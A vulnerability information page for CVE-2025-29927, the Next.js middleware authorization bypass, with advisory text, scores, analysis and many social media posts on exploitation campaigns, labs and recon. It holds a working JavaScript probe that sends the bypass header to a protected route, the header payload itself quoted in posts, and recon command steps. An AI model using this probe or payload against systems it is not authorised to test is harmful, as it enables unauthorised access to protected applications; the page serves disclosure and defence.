CVE-2025-29927

Published Mar 21, 2025

Last updated 9 months ago

CVSS critical 9.1
React
Next.js

Overview

AI description

Automated description summarized from trusted sources.

CVE-2025-29927 is an authorization bypass vulnerability in Next.js, a React framework. Next.js uses the internal `x-middleware-subrequest` header to mark sub-requests it issues itself so that middleware is not re-run recursively, and affected versions honoured that header when it arrived from an external client. An attacker who adds it to an ordinary request therefore causes the middleware to be skipped, so any check implemented there, such as validating an authorization cookie before a protected route is served, never runs. Self-hosted Next.js applications that rely on Middleware for authentication or other security checks are affected. The vulnerability is fixed in Next.js 12.3.5, 13.5.9, 14.2.25 and 15.2.3.

Description
Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommended that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
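The description above gives the mechanism (an externally supplied x-middleware-subrequest header makes affected versions skip middleware) but not a way to check a deployment. The following is an added example, not code from the advisory or the Next.js project: it fetches a protected route once normally and once with the header, and compares the two responses. The target URL and path are placeholders; the "src/middleware" and "pages/_middleware" header variants, and the note on how affected releases count repetitions, come from public analysis of the bug rather than from this page.

```javascript
// Added example, not code from the advisory or the Next.js project.
// Probes a self-hosted Next.js deployment for CVE-2025-29927 by fetching a protected
// route twice, once normally and once with the x-middleware-subrequest header, and
// comparing the two responses. Needs Node 18+ for the global fetch().

const SUBREQUEST_HEADER = 'x-middleware-subrequest';

// Header values used in public proof-of-concepts. The repeated "middleware" token is
// the form quoted on this page; "src/middleware" (middleware kept under src/) and
// "pages/_middleware" (pre-12.2 projects) come from public write-ups, not this page.
// Newer affected releases count how often the middleware name repeats and skip it once
// a recursion limit is reached; older ones only look for the name. Five repetitions
// covers both, so it is the default depth here.
function bypassValues(depth = 5) {
  return ['middleware', 'src/middleware', 'pages/_middleware'].map((name) =>
    Array(depth).fill(name).join(':'),
  );
}

// A "denied" response is what a middleware auth check normally produces: a redirect
// to a login page or an explicit 401/403.
function isDenied(res) {
  return res.status === 401 || res.status === 403 || (res.status >= 300 && res.status < 400);
}

// Compare the baseline response (no header) with the probe response (header set).
// Both are plain objects: { status: number, location: string | null }.
function assess(baseline, probe) {
  if (!isDenied(baseline)) return 'not-protected';   // nothing for the header to bypass
  if (probe.status === 200) return 'likely-vulnerable';
  if (probe.status === baseline.status && probe.location === baseline.location) {
    return 'not-vulnerable';
  }
  return 'inconclusive';
}

// Fetch the route with and without each candidate header value. redirect: 'manual'
// keeps the 3xx visible instead of following it to the login page.
async function probeTarget(baseUrl, protectedPath) {
  const url = new URL(protectedPath, baseUrl).toString();
  const snapshot = async (headers) => {
    const res = await fetch(url, { headers, redirect: 'manual' });
    return { status: res.status, location: res.headers.get('location') };
  };
  const baseline = await snapshot({});
  const results = [];
  for (const value of bypassValues()) {
    const probe = await snapshot({ [SUBREQUEST_HEADER]: value });
    results.push({ value, status: probe.status, verdict: assess(baseline, probe) });
  }
  return { baseline, results };
}

// Usage: node probe.js https://app.example.test /dashboard   (hypothetical target)
if (process.argv[2] && process.argv[2].startsWith('http')) {
  probeTarget(process.argv[2], process.argv[3] || '/')
    .then((report) => console.log(JSON.stringify(report, null, 2)))
    .catch((err) => { console.error(err.message); process.exit(1); });
}
```

A route that already answers 200 without credentials gives no signal, so pick a path the middleware is known to guard. Only test systems you are authorised to assess; the probe is indistinguishable from the real attack in server logs.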
Source
security-advisories@github.com
NVD status
Analyzed
Products
next.js

Insights

Analysis from the Intruder Security Team
Published Mar 24, 2025 Updated Mar 24, 2025

This authorization bypass vulnerability in Next.js allows an attacker to skip middleware validation steps such as checking that the user is authorized to access a resource. The exploit is simple to use and could be exploited en masse, though some manual effort is likely to be required to identify routes that are not accessible without authentication.

The advisory states that deployments using next start and output: 'standalone' should be updated as a priority, and lists the affected versions.

Next.js is a full-stack framework; applications that do not use Middleware at all (for example static exports that ship only the front-end) are not vulnerable. Popular WAFs such as Cloudflare added detection rules for this exploit soon after disclosure, so applications deployed behind a WAF with effective rules are at reduced risk. However, a WAF should not be relied upon to protect against this weakness: further research could reveal bypasses or alternative routes to exploit it, and the only complete fix is to upgrade to a patched version.

Risk scores

CVSS 3.1

Type
Secondary
Base score
9.1
Impact score
5.2
Exploitability score
3.9
Vector string
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Severity
CRITICAL

Weaknesses

security-advisories@github.com
CWE-285
nvd@nist.gov
CWE-863

Social media

Hype score
Not currently trending
  1. A Next.js PR trusted `x-middleware-subrequest` from external clients, bypassing auth. CVE-2025-29927 (CVSS 9.1). Our analyzer caught it on the diff. 🔗 https://t.co/rahNsKsfRC

    @polsia

    12 Jun 2026

    42 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  2. Your Next.js middleware runs on every request. Or it's supposed to. CVE-2025-29927 let attackers skip it entirely — with a single HTTP header. No exploit code. No auth bypass tool. Just curl and one header. If middleware was your only auth layer, every protected route was ope

    @DataHogo

    18 May 2026

    269 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  3. Someone added one HTTP header to a request. The dashboard loaded. No login. No session. No credentials. Just: x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware That's CVE-2025-29927. It bypassed every Next.js middleware check in versions 11.1.4

    @DataHogo

    18 May 2026

    284 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  4. Why CVE-2026-44578 is not like CVE-2025-29927: 44578: the proxy feature runs — just to a forbidden target → #1 29927: middleware protection is skipped → #2 Same Next.js ecosystem. Buzzwords group them. TLCTC separates causes. https://t.co/XBSqMhGK1w #TLCTC #Cybersec

    @fr33thought

    15 May 2026

    32 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  5. I just completed Next.js: CVE-2025-29927 room on TryHackMe! Explore an authorisation bypass vulnerability in Next.js. https://t.co/uN3XW5fFa8 #tryhackme via @tryhackme #tryhackme #learning #Consistency

    @LittleSun4lower

    9 May 2026

    250 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  6. "PCP replaced" - the metric tracked by PCPJack's C2. PCPJack is a Linux credential-stealing worm disclosed May 7, 2026 by SentinelLabs. It exploits five CVEs to spread: - CVE-2025-29927 (Next.js middleware auth bypass) - CVE-2025-55182 "React2Shell" (Next.js Server Actions

    @SecureChap

    8 May 2026

    283 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  7. New PCPJack worm targets cloud infrastructure, stealing credentials from Docker/Kubernetes/Redis while actively removing TeamPCP infections. Exploits 5 recent CVEs including CVE-2025-29927 and CVE-2026-1357 for initial access. #DFIR_Radar https://t.co/4pMlgIN6MQ

    @DFIR_Radar

    7 May 2026

    341 Impressions

    0 Retweets

    2 Likes

    1 Bookmark

    1 Reply

    0 Quotes

  8. What started as bash scripts and scheduled scans evolved into full scale cloud-native execution with Nuclei Cloud. When the Next.js CVE-2025-29927 dropped, Elastic scanned 14,500 assets in under 5 minutes, something that previously took days. Read the full customer story here

    @pdiscoveryio

    30 Apr 2026

    1142 Impressions

    2 Retweets

    10 Likes

    4 Bookmarks

    0 Replies

    0 Quotes

  9. We just got hit with the worst cybersecurity attack. Issue traced back to Opus committing "Good for now, not a big deal" on a well-known vulnerability from last year, "CVE-2025-29927". In order to fix an issue, Opus 4.6 chose to downgrade Next.js to 15.0.3, which has severe known issues.

    @4n1rudh4

    15 Apr 2026

    103 Impressions

    0 Retweets

    2 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  10. [CYBERSEC] Next.js CVE-2025-29927 Allows Full Authentication Bypass In March 2025, Vercel disclosed CVE-2025-29927, a critical flaw in

    @DarkForgeNews

    2 Apr 2026

    113 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  11. Researchers have uncovered a critical vulnerability (CVE-2025-29927) in Next.js middleware, allowing authorization bypass. Learn about the exploit and fixes. https://t.co/dUBFM8DcV0

    @pedri77

    26 Mar 2026

    133 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  12. [Qiita] An article about [Next.js CVE-2025-29927] written a year ago by the remarkable @suin: https://t.co/SxGcP0On3a

    @q_hayari

    25 Mar 2026

    223 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  13. A vibe-coded Next.js app got a cryptominer. Not from bad prompting. Not from a bad model. The AI pinned a vulnerable dependency. The app passed functional tests. Nobody asked "why this version?" Attacker found CVE-2025-29927. Middleware bypass. Mining binary. 100% CPU. AI

    @gremlinworks_

    17 Mar 2026

    101 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  14. 1/4: Did you leave the door to your Next.js site open? (CVE-2025-29927) 🚨 It is possible to get past your entire auth and CSP layer with a single header. The current meta: **x-middleware-subrequest** abuse. Let's look at how it works and how to protect against it. 🧵 2/

    @logapsec

    10 Mar 2026

    153 Impressions

    0 Retweets

    1 Like

    1 Bookmark

    0 Replies

    0 Quotes

  15. I just completed Next.js: CVE-2025-29927 room on TryHackMe! Explore an authorisation bypass vulnerability in Next.js. https://t.co/UNic0BXic5 #tryhackme via @tryhackme

    @ToTo13ru_xakep

    9 Mar 2026

    38 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  16. 🚨 Nextjs Middleware Bypass Flaw (#CVE-2025-29927): A Deep Dive into the Vulnerability and How to Secure Your Apps + Video https://t.co/EkI4a9gG6E Educational Purposes!

    @UndercodeUpdate

    23 Feb 2026

    26 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  17. I just completed Next.js: CVE-2025-29927 room on TryHackMe! Explore an authorisation bypass vulnerability in Next.js. https://t.co/mHFw7nPj0s #tryhackme via @tryhackme

    @acupunc28094787

    22 Feb 2026

    43 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  18. 🚨 CVE-2026-1281 Critical Code Injection in Ivanti EPMM: What You Should Know 🚨 Discover the key information you need to know about CVE-2025-29927, an authentication bypass vulnerability in the middleware layer in Vercel’s Next.js. Learn more: https://t.co/FBnEhbfv8Y htt

    @pluralsight

    3 Feb 2026

    1136 Impressions

    0 Retweets

    0 Likes

    2 Bookmarks

    0 Replies

    0 Quotes

  19. 🚨 Next.js Middleware Auth Bypass (CVE-2025-29927 | CVSS 9.1) One trusted header. Skipped middleware. Full app compromise. Our research shows how a single request leads to auth bypass, LFI & server takeover. Full blog: https://t.co/s20LKcdmiF Connect - https://t.co/wRAYxGeO

    @consult_secnuo

    28 Jan 2026

    31 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  20. CVE-2025-29927: Next.js Middleware Bypass: When 'I'm With The Band' Actually Works https://t.co/YkiB6BgVG9 #security #cybersecurity #cve #ghsa

    @_cvereports

    12 Jan 2026

    12 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  21. Top 5 Trending CVEs: 1 - CVE-2025-43533 2 - CVE-2023-29218 3 - CVE-2026-20029 4 - CVE-2025-55182 5 - CVE-2025-29927 #cve #cvetrends #cveshield #cybersecurity https://t.co/4Fua3CAN6W

    @CVEShield

    11 Jan 2026

    75 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  22. HackTheBox - Previous ⚙️ Authorization Bypass in Next.js (CVE-2025-29927) 📂 File download via Path Traversal 🔑 Credentials for SSH 🚀 Privesc with sudo and Terraform https://t.co/qmQvcGDXzd

    @sckull_

    10 Jan 2026

    54 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  23. Previous from @hackthebox_eu features CVE-2025-29927 (NextJS middleware auth bypass), directory traversal for file read, and three ways to abuse a Terraform sudo rule with !env_reset to get root. https://t.co/8wz1Fnbz38

    @0xdf_

    10 Jan 2026

    1974 Impressions

    5 Retweets

    32 Likes

    8 Bookmarks

    1 Reply

    0 Quotes

  24. Best of 2025: CVE-2025-29927 – Understanding the Next.js Middleware Vulnerability - Security Boulevard https://t.co/7C55OcSEEd

    @PVynckier

    4 Jan 2026

    116 Impressions

    1 Retweet

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  25. Day 79 of #100DaysOfCybersecurity🛡️ Next.js CVE-2025-29927 lab completed ✅ Analyzed an authorization bypass where a crafted HTTP header skips middleware checks and exposes protected routes ⚠️ Affects Next.js versions before 14.2.25 and 15.2.3. Patch now. https://t.

    @HezyChacha

    31 Dec 2025

    23 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  26. I just completed Next.js: CVE-2025-29927 room on TryHackMe. Explore an authorisation bypass vulnerability in Next.js. https://t.co/VQjqTYrVDA #tryhackme via @tryhackme

    @HezyChacha

    31 Dec 2025

    36 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  27. Recently a hacking group called PCPcat has been using two vulnerabilities, tracked as CVE-2025-29927 and CVE-2025-66478, to break into servers. One of these vulnerabilities relates to

    @AmirHossein_sec

    25 Dec 2025

    57 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  28. Operation PCPcat Hacked 59,000+ Next.js/React Servers Within 48 Hours A massive credential-theft campaign dubbed PCPcat compromised 59,128 Next.js servers in under 48 hours. The operation exploits critical vulnerabilities CVE-2025-29927 and CVE-2025-66478, achieving a 64.6%

    @redhuvivek09

    25 Dec 2025

    161 Impressions

    0 Retweets

    3 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  29. 🚨 Operation PCPcat: Credential-Stealing Campaign Hijacks 59,000+ Next.js Servers via React/Next.js RCE A mass exploitation campaign is compromising internet-facing Next.js deployments by chaining CVE-2025-29927 and CVE-2025-66478 for RCE, then scraping high-value secrets (.env

    @ThreatSynop

    25 Dec 2025

    3 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  30. 🚨 Operation PCPcat Hacked 59,000+ Next.js/React Servers Within 48 Hours Source: https://t.co/O09ua70IX0 A massive credential-theft campaign dubbed PCPcat compromised 59,128 Next.js servers in under 48 hours. The operation exploits critical vulnerabilities CVE-2025-29927 and

    @The_Cyber_News

    24 Dec 2025

    4808 Impressions

    34 Retweets

    95 Likes

    28 Bookmarks

    3 Replies

    1 Quote

  31. 59,128 Next.js servers were hacked within 48 hours. Reported by Beelzebub. A chain of CVE-2025-29927 and CVE-2025-66478. Attack success rate 64.6%. Investigated by reconnaissance of the C2 server. The activity has been named Operation PCPcat. https://t.co/FIwX4EOrYX

    @__kokumoto

    24 Dec 2025

    3471 Impressions

    14 Retweets

    46 Likes

    16 Bookmarks

    0 Replies

    1 Quote

  32. PCPcat malware compromises 59,000+ servers in under 48 hours via React2Shell exploit, abusing .js/React RCE flaws CVE-2025-29927 and CVE-2025-66478 for unauthenticated remote code execution. #Malware https://t.co/3iSPlAiBTl

    @threatcluster

    15 Dec 2025

    33 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  33. I just completed Next.js: CVE-2025-29927 room on TryHackMe. Explore an authorisation bypass vulnerability in Next.js. https://t.co/FxrOM7K1yV #tryhackme via @tryhackme

    @mXgarweg

    13 Dec 2025

    35 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  34. ⚠️ SCASH Wallet security notice & service status update. After emergency maintenance, our web wallet is back to normal. The block explorer will be restored within 24 hours. The problem stemmed from a publicly disclosed vulnerability in Next.js (CVE-2025-29927). The vulnerability allows an attacker, by crafting

    @Hysanalde

    8 Dec 2025

    1267 Impressions

    7 Retweets

    23 Likes

    2 Bookmarks

    5 Replies

    0 Quotes

  35. 🚨 Even popular frameworks like Next.js can have serious flaws… Just completed the Next.js: CVE-2025-29927 room on @TryHackMe 🧠💻 Dug into an authorization bypass vulnerability and how attackers can exploit weak access control. 🔗 https://t.co/7npcdvpCc5 #TryHackMe

    @BlackLightning5

    24 Nov 2025

    10 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  36. CVE-2025-29927 https://t.co/fmtDlTNkXc

    @ExWareLabs

    19 Nov 2025

    46 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  37. Want to learn a way to find those hard-hitting critical vulnerabilities? 🐛 CVE-2025-29927 is a vulnerability in Next.JS that can lead to a complete authorization bypass. Watch the video below to get a quick peek and then try the lab yourself 👇 https://t.co/zC6GAAqOB0… h

    @Kimcheater_

    16 Nov 2025

    41 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  38. If you authenticate in Next.js Middleware, check right away! Explanation and countermeasures for the authorization bypass vulnerability (CVE-2025-29927) https://t.co/IrxQiIPHiR #Qiita

    @keigoriankami

    10 Nov 2025

    18 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  39. CVE-2025-29927 - #Next.js Auth Bypass PoC https://t.co/AJsKE1EMUA #hacking

    @hack4lifemx

    6 Nov 2025

    101 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  40. Want to learn a way to find those hard-hitting critical vulnerabilities? 🐛 CVE-2025-29927 is a vulnerability in Next.JS that can lead to a complete authorization bypass. Watch the video below to get a quick peek and then try the lab yourself 👇 https://t.co/U8HN812Oey http

    @hackinghub_io

    5 Nov 2025

    6422 Impressions

    23 Retweets

    122 Likes

    91 Bookmarks

    1 Reply

    0 Quotes

  41. Post 1/30 : CVE-2025-29927 How to find Vulnerable Assets for it! Steps; 1. Get all domains and IPS Domains >> Subfinder -dL list-of-domain.txt -o subdomains.txt IPs >> shodan search "ssl:'domain.tld'" --fields ip_str --limit 1000 >> ips.txt 2. find their op

    @h4x0r_fr34k

    19 Oct 2025

    11773 Impressions

    31 Retweets

    249 Likes

    272 Bookmarks

    1 Reply

    1 Quote

  42. Day 1/30 : CVE-2025-29927 How to find Vulnerable Assets for it! Steps; 1. Get all domains and IPS Domains >> Subfinder -dL list-of-domain.txt -o subdomains.txt IPs >> shodan search "ssl:'domain.tld'" --fields ip_str --limit 1000 >> ips.txt 2. find their ope

    @h4x0r_fr34k

    19 Oct 2025

    31 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  43. I was awarded a $290 bounty on @Hacker0x01! https://t.co/5dbKBrWp1S #TogetherWeHitHarder #bugbountytips Tip: CVE-2025-29927 via /admin https://t.co/sERtc8B1ks

    @exploit_msf

    4 Oct 2025

    3254 Impressions

    2 Retweets

    127 Likes

    15 Bookmarks

    2 Replies

    0 Quotes

  44. 🚨 New video available! Exploiting CVE-2025-29927 against a vulnerable middleware 💥 From detection to a working PoC. ✅ Identify the vulnerable version ✅ Hook up Burp and analyse 🎯 Applied offensive thinking. No theory. 📺 https://t.co/Noy9UEmX

    @gorkaelbochi

    20 Sept 2025

    74 Impressions

    0 Retweets

    0 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  45. 🚨CVE-2025-29927: Next.js Middleware Bypass Vulnerability PoC: https://t.co/olD5JesWY1 Credit: https://t.co/3XCm1VLLsI https://t.co/nIJFC7hjf4

    @DarkWebInformer

    17 Sept 2025

    7723 Impressions

    19 Retweets

    97 Likes

    52 Bookmarks

    0 Replies

    1 Quote

  46. 🚨 New video now available! 📽️ Exploiting CVE-2025-29927 step by step 🧠 Vulnerable middleware → working PoC → real execution ✅ Detect the vulnerable version ✅ Analyse the flow ✅ Build the PoC ✅ Practical exploitation 📺 https://t.co/Noy9UEmXIo

    @gorkaelbochi

    16 Sept 2025

    81 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  47. 💡 ⚒️ ✏️  Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927) https://t.co/cDC5TeXhMw

    @pedri77

    15 Sept 2025

    46 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  48. 🚨 This Tuesday the 16th at 20:00 I'm posting a video: step-by-step exploitation of CVE-2025-29927 🧠 The target? A vulnerable middleware. You'll see: ✅ What middleware is ✅ How to detect the vulnerable version ✅ How to exploit it (for real) 💥 No theory. All practical. 💞 ht

    @gorkaelbochi

    15 Sept 2025

    52 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  49. I just completed Next.js: CVE-2025-29927 room on TryHackMe. Explore an authorisation bypass vulnerability in Next.js. https://t.co/3sLnz8REQ3 #tryhackme via @realtryhackme

    @vinnykosgeii

    13 Sept 2025

    62 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  50. 🚨 Next.js CVE-2025-29927 – Authentication Bypass Explained 🔎 What Happened? A critical vulnerability in Next.js middleware (CVE-2025-29927, CVSS 9.1) allows attackers to bypass authentication and authorization checks. The root cause: improper trust of an internal header

    @AnonOzzyDude

    8 Sept 2025

    55 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes
